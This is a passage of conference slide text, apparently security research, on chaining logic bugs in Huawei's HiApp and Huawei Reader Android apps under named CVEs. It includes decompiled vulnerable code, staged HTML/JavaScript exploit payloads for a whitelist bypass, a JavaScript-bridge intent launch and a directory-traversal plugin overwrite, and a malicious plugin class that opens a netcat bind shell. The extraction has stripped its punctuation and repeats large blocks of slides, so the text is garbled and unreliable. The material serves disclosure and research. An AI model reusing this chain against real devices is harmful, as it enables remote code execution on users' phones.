appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=
100Ssome_str=helloend
Action comexampleMY_ACTION
Package comexampleapp
Extras some_int=(int)100 some_str=(String)hello
HiApp ndash stage2html (CVE-2018-7932)
37
var pkg = comhuaweihwireader
var uri =
androidapphttpwwwgooglecoukIntentcomponent=comh
uaweihwireadercomzhangyueiReaderonlineuiActivityWeba
ction=comhuaweihwireaderSHOW_DETAILSurl=http192
16813718000stage3htmlend
windowHiSpaceObjectlaunchApp(pkguri)
Stage 2
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
Huawei Reader Application
39
Huawei Reader ndash Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8)
CharSequence v0_1
String v0
CharSequence v1 = null
superonCreate(arg8)
Intent v2 = thisgetIntent()
if(v2 = null) Uri v3 = v2getData()
if(v3 = null) v0 = v3getScheme()
else v0_1 = v1
v0 = v2getStringExtra(url)
if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
Exploit Mitigation Advancement
bull Memory Safety Mitigations
ndash ASLR PIE RELTO PartitionAlloc
bull Means you need mitigation bypass vulnerabilities too
bull Time consuming debugging memory corruption exploits on a real device
13
Attackers - Positives of Logic Bug Chains
bull Often design issues
ndash Hard to fix (long bug lives)
ndash Increased reliability
bull Architectural agnostic
ndash No problems with shellcode
bull Android IPC specifically is complex as hell
bull Harder to detect
14
Attackers - Negatives of Logic Bug Chains
bull They can get ridiculously long (11 Bugs in S8)
ndash One bug gets fixed and the whole chain is screwed
ndash Usually not particularly stealthy
Samsung phone rebooted
Huawei phone switches apps twice
bull Often requires a deeper understanding of the application
bull Automated detection is harder ndash how do you fuzz for logic bugs
15
Bug Hunting Tips
bull How too prioritise
ndash External Attack Surface (Reachable from browser)
ndash Permissions
Less of an issue for initial foothold
ndash Dangerous words
16
bull Want to rapidly find high risk issues in a large amount of apps
PUBLIC
Tooling and Automation
Toolset (Static vs Dynamic)
bull Android What do we care about
ndash BROWSABLE intents (Need to be web accessible) and Intents
ndash Content we can load into the applications (either via a WebView or Media)
ndash Controlled file writes reads
ndash Unsafe class loading
18
Increasing the attack surface
How do we get more things accessible
bull Intent Proxy Bugs
bull MITM stuff (SSL weaknesses)
19
Intent Proxy Example
bull Android Vendingbull LaunchUrlHandlerActivity
bull We control the package name and URIfinal Intent a(Intent arg17 b arg18 j arg19)
Intent v2_1Uri v7 = arg17getData()String v8 = v7getQueryParameter(url)String v10 = v7getQueryParameter(id)
hellipif((v5) ampamp (v12))
v2_1 = new Intent(androidintentactionVIEW)v2_1setData(Uriparse(v8))v2_1setPackage(v10)return v2_1
hellip
Toolset (Static Analysis)
bull Rezord (internal) ndash Mass de-compilation of all apps
bull JEB
bull Grep
21
lsquoJandroidrsquo ndash Static analysis
22
lsquoJandroidrsquo ndash Static analysis
23
lsquoJandroidrsquo ndash Static analysis
bull For more info see Chainspotting Building Exploit Chains with Logic Bugs
slides
httpsinfiltrateconcomarchives[Infiltrate]20Geshev20and20Miller20
-20Logic20Bug20Hunting20in20Chrome20on20Androidpdf
24
Dynamic Analysis Toolset
Global Hook Flexible Requires Root Lightweight
Xposed
Frida
bull Xposedbull Early injection (Zygote)
bull Global hooks across multiple applications
bull Fridabull Quick and easy prototyping
bull Debugging and dynamic analysis of obfuscated code
PUBLIC
Vulnerabilities
Building an Exploit Chain
bull So what do we need to dobull Assuming no memory corruption
bull BROWSABLE Intent URI handler etc
Browse to Website on
Device
Code Exec and Profit
HiApp ndash Huawei Market Place (App Gallery)
29
HiApp ndash Whitelist Bypass (CVE-2018-7931)
30
ltactivity androidconfigChanges=orientation|screenSize
androidlaunchMode=singleTopldquo
androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi
vity androidtheme=styleloading_activity_stylegt
ltintent-filtergt
ltaction androidname=androidintentactionVIEW gt
ltcategory androidname=androidintentcategoryDEFAULT gt
ltcategory androidname=androidintentcategoryBROWSABLE gt
ltdata androidhost=details androidscheme=appmarket gt
ltdata androidhost=search androidscheme=market gt
ltdata androidhost=avmallcom androidscheme=https gt
ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt
HiApp ndash Whitelist Bypass (CVE-2018-7931)
31
public List b()
if(ba(thisa))
thisa = new ArrayList()
thisaclear()
thisaadd(hicloudcom$)
thisaadd(vmallcom$)
thisaadd(huaweicom$)
Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()
do If(v1hasNext()) if(v1next()booleanValue()) continue
HiApp ndash stage1html (CVE-2018-7931)
32
documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1
Stage 1
Browse to Website on
Device
BROWSABLE Intent-
WebView
Code Exec and Profit
HiApp ndash JavaScript Bridge (CVE-2018-7932)
34
thiswebviewgetSettings()setJavaScriptEnabled(true)
thiswebviewrequestFocus()
thiswebviewsetWebViewClient(new InternalWebViewClient(this))
thiswebviewsetWebChromeClient(new
MarketWebChromeClient(this))
thiswebviewgetSettings()setBlockNetworkImage(true)
thiswebviewaddJavascriptInterface(new
HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)
HiApp ndash JavaScript Bridge (CVE-2018-7932)
35
JavascriptInterface public void launchApp(String arg7 String
arg8)
URISyntaxException v1_1
v0_1 = IntentparseUri(arg8 0)
try v0_1setPackage(arg7)
thismActivitystartActivity(v0_1)
android-app URI Schema
36
httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco
ntentIntentjava
android-apppackage_id[scheme[host[path]]][Intent]
android-
appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=
100Ssome_str=helloend
Action comexampleMY_ACTION
Package comexampleapp
Extras some_int=(int)100 some_str=(String)hello
HiApp ndash stage2html (CVE-2018-7932)
37
var pkg = comhuaweihwireader
var uri =
androidapphttpwwwgooglecoukIntentcomponent=comh
uaweihwireadercomzhangyueiReaderonlineuiActivityWeba
ction=comhuaweihwireaderSHOW_DETAILSurl=http192
16813718000stage3htmlend
windowHiSpaceObjectlaunchApp(pkguri)
Stage 2
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
Huawei Reader Application
39
Huawei Reader ndash Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8)
CharSequence v0_1
String v0
CharSequence v1 = null
superonCreate(arg8)
Intent v2 = thisgetIntent()
if(v2 = null) Uri v3 = v2getData()
if(v3 = null) v0 = v3getScheme()
else v0_1 = v1
v0 = v2getStringExtra(url)
if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
Attackers - Positives of Logic Bug Chains
bull Often design issues
ndash Hard to fix (long bug lives)
ndash Increased reliability
bull Architectural agnostic
ndash No problems with shellcode
bull Android IPC specifically is complex as hell
bull Harder to detect
14
Attackers - Negatives of Logic Bug Chains
bull They can get ridiculously long (11 Bugs in S8)
ndash One bug gets fixed and the whole chain is screwed
ndash Usually not particularly stealthy
Samsung phone rebooted
Huawei phone switches apps twice
bull Often requires a deeper understanding of the application
bull Automated detection is harder ndash how do you fuzz for logic bugs
15
Bug Hunting Tips
bull How too prioritise
ndash External Attack Surface (Reachable from browser)
ndash Permissions
Less of an issue for initial foothold
ndash Dangerous words
16
bull Want to rapidly find high risk issues in a large amount of apps
PUBLIC
Tooling and Automation
Toolset (Static vs Dynamic)
bull Android What do we care about
ndash BROWSABLE intents (Need to be web accessible) and Intents
ndash Content we can load into the applications (either via a WebView or Media)
ndash Controlled file writes reads
ndash Unsafe class loading
18
Increasing the attack surface
How do we get more things accessible
bull Intent Proxy Bugs
bull MITM stuff (SSL weaknesses)
19
Intent Proxy Example
bull Android Vendingbull LaunchUrlHandlerActivity
bull We control the package name and URIfinal Intent a(Intent arg17 b arg18 j arg19)
Intent v2_1Uri v7 = arg17getData()String v8 = v7getQueryParameter(url)String v10 = v7getQueryParameter(id)
hellipif((v5) ampamp (v12))
v2_1 = new Intent(androidintentactionVIEW)v2_1setData(Uriparse(v8))v2_1setPackage(v10)return v2_1
hellip
Toolset (Static Analysis)
bull Rezord (internal) ndash Mass de-compilation of all apps
bull JEB
bull Grep
21
lsquoJandroidrsquo ndash Static analysis
22
lsquoJandroidrsquo ndash Static analysis
23
lsquoJandroidrsquo ndash Static analysis
bull For more info see Chainspotting Building Exploit Chains with Logic Bugs
slides
httpsinfiltrateconcomarchives[Infiltrate]20Geshev20and20Miller20
-20Logic20Bug20Hunting20in20Chrome20on20Androidpdf
24
Dynamic Analysis Toolset
Global Hook Flexible Requires Root Lightweight
Xposed
Frida
bull Xposedbull Early injection (Zygote)
bull Global hooks across multiple applications
bull Fridabull Quick and easy prototyping
bull Debugging and dynamic analysis of obfuscated code
PUBLIC
Vulnerabilities
Building an Exploit Chain
bull So what do we need to dobull Assuming no memory corruption
bull BROWSABLE Intent URI handler etc
Browse to Website on
Device
Code Exec and Profit
HiApp ndash Huawei Market Place (App Gallery)
29
HiApp ndash Whitelist Bypass (CVE-2018-7931)
30
ltactivity androidconfigChanges=orientation|screenSize
androidlaunchMode=singleTopldquo
androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi
vity androidtheme=styleloading_activity_stylegt
ltintent-filtergt
ltaction androidname=androidintentactionVIEW gt
ltcategory androidname=androidintentcategoryDEFAULT gt
ltcategory androidname=androidintentcategoryBROWSABLE gt
ltdata androidhost=details androidscheme=appmarket gt
ltdata androidhost=search androidscheme=market gt
ltdata androidhost=avmallcom androidscheme=https gt
ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt
HiApp ndash Whitelist Bypass (CVE-2018-7931)
31
public List b()
if(ba(thisa))
thisa = new ArrayList()
thisaclear()
thisaadd(hicloudcom$)
thisaadd(vmallcom$)
thisaadd(huaweicom$)
Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()
do If(v1hasNext()) if(v1next()booleanValue()) continue
HiApp ndash stage1html (CVE-2018-7931)
32
documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1
Stage 1
Browse to Website on
Device
BROWSABLE Intent-
WebView
Code Exec and Profit
HiApp ndash JavaScript Bridge (CVE-2018-7932)
34
thiswebviewgetSettings()setJavaScriptEnabled(true)
thiswebviewrequestFocus()
thiswebviewsetWebViewClient(new InternalWebViewClient(this))
thiswebviewsetWebChromeClient(new
MarketWebChromeClient(this))
thiswebviewgetSettings()setBlockNetworkImage(true)
thiswebviewaddJavascriptInterface(new
HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)
HiApp ndash JavaScript Bridge (CVE-2018-7932)
35
JavascriptInterface public void launchApp(String arg7 String
arg8)
URISyntaxException v1_1
v0_1 = IntentparseUri(arg8 0)
try v0_1setPackage(arg7)
thismActivitystartActivity(v0_1)
android-app URI Schema
36
httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco
ntentIntentjava
android-apppackage_id[scheme[host[path]]][Intent]
android-
appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=
100Ssome_str=helloend
Action comexampleMY_ACTION
Package comexampleapp
Extras some_int=(int)100 some_str=(String)hello
HiApp ndash stage2html (CVE-2018-7932)
37
var pkg = comhuaweihwireader
var uri =
androidapphttpwwwgooglecoukIntentcomponent=comh
uaweihwireadercomzhangyueiReaderonlineuiActivityWeba
ction=comhuaweihwireaderSHOW_DETAILSurl=http192
16813718000stage3htmlend
windowHiSpaceObjectlaunchApp(pkguri)
Stage 2
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
Huawei Reader Application
39
Huawei Reader ndash Input Validation (CVE-2017-15308)
40
protected void onCreate(Bundle arg8)
CharSequence v0_1
String v0
CharSequence v1 = null
superonCreate(arg8)
Intent v2 = thisgetIntent()
if(v2 = null) Uri v3 = v2getData()
if(v3 = null) v0 = v3getScheme()
else v0_1 = v1
v0 = v2getStringExtra(url)
if(TextUtilsisEmpty(((CharSequence)v0))) goto label_51 thisloadRefreshUrl(v0)
Huawei Reader ndash Input Validation (CVE-2017-15308)
41
JavascriptInterface public void do_command(String arg9)
String v4 = ((JSONObject)v2_3)getString(Action)
LOGI(js actionName + v4)
JSONObject v5 =
((JSONObject)v2_3)getJSONObject(Data)
if(v4equalsIgnoreCase(onlineReader))
JSProtocolmJSBookProtocolonline(v5) return
if(v4equalsIgnoreCase(readNow))
JSProtocolmJSBookProtocolreadNow(v5) return
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
42
public void originalDownload(JSONObject arg19 boolean
arg20 boolean arg21)
v8 = 0
v10 = v4
v4_1 = 0
try
int v13 = v7getInt(Type)
v14 = v7optInt(Version)
v15 = v7optBoolean(getDrmAuth true)
v3 = PATHgetBookDir() + v7getString(FileName)
v2 = v7getInt(FileId)
v6 = v7getString(DownloadUrl)
Huawei Reader ndash Arbitrary Write Directory Traversal (CVE-2017-15309)
43
function download_plugin()
var json =
ActiononlineReaderDataChargingFeeType0OrderUrlhttp192168137180
01aaaaaPrice0
DownloadInfoChapterId1FeeUnit10Type1FileId32532639FileNameplu
ginsDFServiceclassesjar
FileSize10000000Ebk3DownloadUrlhttpss3-ap-northeast
1amazonawscom4aaaaaa9q84q87reertw35wy5testzip
DownloadUrlhttpss3-ap-northeast-
1amazonawscomk4aaaaaaertw35wy5testzipVersion2
windowZhangYueJSdo_command(json)
Stage 3
Browse to Website on
Device
BROWSABLE Intent-
WebView
Exported Intent -
WebView
Code Exec and Profit
File Write
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
45
public boolean onChapPack(JSONObject arg10)
boolean v0_2
try int v3 = arg10getInt(StartIndex)
int v4 = arg10getInt(EndIndex)
String v2 = arg10getString(Price)
int v1 = arg10getInt(BookId)
String v5 = arg10getString(PayURL)
String v0_1 = arg10getString(DownloadURL)
String v7 = PATHgetBookDir() + arg10getString(FileName)
if((FILEisExist(PATHgetBookNameCheckOpenFail(v7))) ampamp
DevicegetNetType() = 0xFFFFFFFF)
FILEdelete(PATHgetBookCachePathNamePostfix(v7))
FILEdelete(v7)
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
46
public static String getBookNameCheckOpenFail(String arg2)
return PATHgetOpenFailDir() + MD5getMD5(arg2)
public static String getOpenFailDir()
return PATHgetWorkDir() + booksopenfail
Huawei Reader ndash Arbitrary Delete (CVE-2017-15310)
47
5457bea93d0548a4d84357308df45322 =
pluginsDFServiceclassesjar
sdcardHWiReaderbooksopenfail5457bea93d0548a4d8435
7308df45322
sdcardHWiReaderbookspluginsDFServiceclassesjar
Huawei Reader ndash Insecure Plugin Loading
48
public static Class loadPlug(Context arg4 String arg5 String arg6) throws Exception
return new DexClassLoader(arg5 arg4getApplicationInfo()dataDir null
arg4getClassLoader())loadClass(arg6)
protected final ArrayList P()
if(pR == null)
try PlatForm v3 = new PlatForm()
Object v2 = UtilloadPlug(APPgetAppContext() v3getPlugDir(DFService)
+
classesjar
comzhangyueiReaderPlugServiceDocFeature)newInstance()
v2setPlatform(((IPlatform)v3))
pR = ((IPlugDFService)v2)
Huawei Reader ndash Insecure Plugin Loading
49
function download_plugin()
documentwriteln(++ Downloading replacement classesjar ++)
It should be noted that FileId needs to be unique for the download to work correctly varjson = ActiononlineReaderDataChargingFeeType0OrderUrlhttp19216813718001aaaaaPrice0DownloadInfoChapterId1FeeUnit10Type1FileId + PLUGIN_FILE_ID + FileNamepluginsDFServiceclassesjarFileSize10000000Ebk3DownloadUrl + PLUGIN_URI + DownloadUrl + PLUGIN_URI + Version2
windowZhangYueJSdo_command(json)
Huawei Reader ndash Payload Creation
50
package comzhangyueiReaderPlugService
import androidutilLog
public class DocFeature
public DocFeature()
comzhangyueiReaderPlugServiceDocFeature
Loge(ATTACKERRUNNING ARBITRARY CODE)
String cmd = datadatacomhuaweihwireaderbusybox
nc -l -p 5555 -e datadatacomhuaweihwireaderbusybox sh
try
RuntimegetRuntime()exec(cmd)
catch (IOException e)
eprintStackTrace()
Demo
51
Questions
52
Credits
bull Georgi Geshev Rob Miller -
httpslabsmwrinfosecuritycompublicationslogic-bug-hunting-in-
chrome-on-androidnew-blog-post
53
Whitepaper
54
bull Full whitepaper can be found on the MWR Labs website
(httpslabsmwrinfosecuritycompublicationsnhuawew-blog-post)
PUBLIC
Attackers - Negatives of Logic Bug Chains
bull They can get ridiculously long (11 Bugs in S8)
ndash One bug gets fixed and the whole chain is screwed
ndash Usually not particularly stealthy
Samsung phone rebooted
Huawei phone switches apps twice
bull Often requires a deeper understanding of the application
bull Automated detection is harder ndash how do you fuzz for logic bugs
15
Bug Hunting Tips
bull How too prioritise
ndash External Attack Surface (Reachable from browser)
ndash Permissions
Less of an issue for initial foothold
ndash Dangerous words
16
bull Want to rapidly find high risk issues in a large amount of apps
PUBLIC
Tooling and Automation
Toolset (Static vs Dynamic)
bull Android What do we care about
ndash BROWSABLE intents (Need to be web accessible) and Intents
ndash Content we can load into the applications (either via a WebView or Media)
ndash Controlled file writes reads
ndash Unsafe class loading
18
Increasing the attack surface
How do we get more things accessible
bull Intent Proxy Bugs
bull MITM stuff (SSL weaknesses)
19
Intent Proxy Example
bull Android Vendingbull LaunchUrlHandlerActivity
bull We control the package name and URIfinal Intent a(Intent arg17 b arg18 j arg19)
Intent v2_1Uri v7 = arg17getData()String v8 = v7getQueryParameter(url)String v10 = v7getQueryParameter(id)
hellipif((v5) ampamp (v12))
v2_1 = new Intent(androidintentactionVIEW)v2_1setData(Uriparse(v8))v2_1setPackage(v10)return v2_1
hellip
Toolset (Static Analysis)
bull Rezord (internal) ndash Mass de-compilation of all apps
bull JEB
bull Grep
21
lsquoJandroidrsquo ndash Static analysis
22
lsquoJandroidrsquo ndash Static analysis
23
lsquoJandroidrsquo ndash Static analysis
bull For more info see Chainspotting Building Exploit Chains with Logic Bugs
slides
httpsinfiltrateconcomarchives[Infiltrate]20Geshev20and20Miller20
-20Logic20Bug20Hunting20in20Chrome20on20Androidpdf
24
Dynamic Analysis Toolset
Global Hook Flexible Requires Root Lightweight
Xposed
Frida
bull Xposedbull Early injection (Zygote)
bull Global hooks across multiple applications
bull Fridabull Quick and easy prototyping
bull Debugging and dynamic analysis of obfuscated code
PUBLIC
Vulnerabilities
Building an Exploit Chain
bull So what do we need to dobull Assuming no memory corruption
bull BROWSABLE Intent URI handler etc
Browse to Website on
Device
Code Exec and Profit
HiApp ndash Huawei Market Place (App Gallery)
29
HiApp ndash Whitelist Bypass (CVE-2018-7931)
30
ltactivity androidconfigChanges=orientation|screenSize
androidlaunchMode=singleTopldquo
androidname=comhuaweiappmarketserviceexternalapiviewThirdApiActi
vity androidtheme=styleloading_activity_stylegt
ltintent-filtergt
ltaction androidname=androidintentactionVIEW gt
ltcategory androidname=androidintentcategoryDEFAULT gt
ltcategory androidname=androidintentcategoryBROWSABLE gt
ltdata androidhost=details androidscheme=appmarket gt
ltdata androidhost=search androidscheme=market gt
ltdata androidhost=avmallcom androidscheme=https gt
ltdata androidhost=comhuaweiappmarket androidscheme=hiapp gtltintent-filtergt
HiApp ndash Whitelist Bypass (CVE-2018-7931)
31
public List b()
if(ba(thisa))
thisa = new ArrayList()
thisaclear()
thisaadd(hicloudcom$)
thisaadd(vmallcom$)
thisaadd(huaweicom$)
Iterator v1 = comhuaweiappmarketservicewhitelistba()iterator()
do If(v1hasNext()) if(v1next()booleanValue()) continue
HiApp ndash stage1html (CVE-2018-7931)
32
documentlocation =hiappcomhuaweiappmarketactivityName=activityUri|webviewactivityampparams=params [ name uri type String value internal_webview name url type String value httpwwwvmallcom8000stage2html ] ampchannelId=1
Stage 1
Browse to Website on
Device
BROWSABLE Intent-
WebView
Code Exec and Profit
HiApp ndash JavaScript Bridge (CVE-2018-7932)
34
thiswebviewgetSettings()setJavaScriptEnabled(true)
thiswebviewrequestFocus()
thiswebviewsetWebViewClient(new InternalWebViewClient(this))
thiswebviewsetWebChromeClient(new
MarketWebChromeClient(this))
thiswebviewgetSettings()setBlockNetworkImage(true)
thiswebviewaddJavascriptInterface(new
HiSpaceObject(thismContext ((JsCallBackOjbect)this) thiswebview) HiSpaceObject)
HiApp ndash JavaScript Bridge (CVE-2018-7932)
35
JavascriptInterface public void launchApp(String arg7 String
arg8)
URISyntaxException v1_1
v0_1 = IntentparseUri(arg8 0)
try v0_1setPackage(arg7)
thismActivitystartActivity(v0_1)
android-app URI Schema
36
httpandroidxrefcom800_r4xrefframeworksbasecorejavaandroidco
ntentIntentjava
android-apppackage_id[scheme[host[path]]][Intent]
android-
appcomexampleappIntentaction=comexampleMY_ACTIONisome_int=
100Ssome_str=helloend
Action comexampleMY_ACTION
Package comexampleapp
Extras some_int=(int)100 some_str=(String)hello
HiApp ndash stage2html (CVE-2018-7932)
37
var pkg = comhuaweihwireader
var uri =
androidapphttpwwwgooglecoukIntentcomponent=comh
uaweihwireadercomzhangyueiReaderonlineuiActivityWeba
